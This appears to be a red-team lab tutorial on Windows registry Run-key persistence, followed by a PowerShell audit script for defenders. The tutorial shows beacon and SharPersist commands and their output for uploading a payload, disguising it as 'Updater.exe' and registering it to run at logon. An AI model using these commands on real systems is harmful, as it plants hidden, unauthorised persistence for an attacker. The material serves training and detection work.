Registry AutoRun

AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.

beacon> cd C:\ProgramData
beacon> upload C:\Payloads\http_x64.exe
beacon> mv http_x64.exe updater.exe
beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option: 
[+] SUCCESS: Registry persistence added

Where:

  • -k is the registry key to modify (hkcurun maps to HKCU\Software\Microsoft\Windows\CurrentVersion\Run, as the output shows).

  • -v is the name of the registry value to create under that key.

As before, you can test this by rebooting the VM.

It's a common misconception that an HKLM autorun will execute the payload as SYSTEM, but this is not the case. An HKCU autorun will only trigger when the owner of the hive logs into the machine. An HKLM autorun will trigger when any user logs into the machine, but it will still run under the context of the user's account.
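From the defender's side, the same Run keys are cheap to audit. The script below is an added example, not part of the original page or of SharPersist: it enumerates the Run/RunOnce values in both hives (including the WOW6432Node view), and flags any entry whose binary lives in a user-writable location such as C:\ProgramData, is missing, or fails Authenticode validation. It assumes it is run in an elevated PowerShell session on the host being checked.

```powershell
# Added example: audit Run/RunOnce autorun values for entries a defender should look at twice.
$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)
# Directories a standard user can write to; legitimate autoruns rarely point here.
$writableRoots = @("$env:ProgramData", "$env:USERPROFILE", "$env:TEMP", "$env:PUBLIC")
# Properties PowerShell adds to every registry item; these are not autorun values.
$psProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-ExecutablePath([string]$command) {
    # Quoted form: "C:\Program Files\x\y.exe" /args ; otherwise the first token is the binary.
    if ($command -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($command -split '\s+')[0]
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -in $psProps) { continue }
        $exe   = [Environment]::ExpandEnvironmentVariables((Get-ExecutablePath $p.Value))
        $flags = @()
        foreach ($root in $writableRoots) {
            if ($exe -like "$root*") { $flags += 'user-writable location'; break }
        }
        if (Test-Path $exe) {
            $sig = Get-AuthenticodeSignature -FilePath $exe
            if ($sig.Status -ne 'Valid') { $flags += "signature: $($sig.Status)" }
        } else {
            $flags += 'binary missing'
        }
        [PSCustomObject]@{
            Key     = $key
            Value   = $p.Name
            Command = $p.Value
            Flags   = if ($flags) { $flags -join '; ' } else { '' }
        }
    }
}
```

Against the persistence shown above, the Updater value would be reported with both "user-writable location" and a non-Valid signature status; in an enterprise, compare the output to a known-good baseline rather than reading it by hand.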
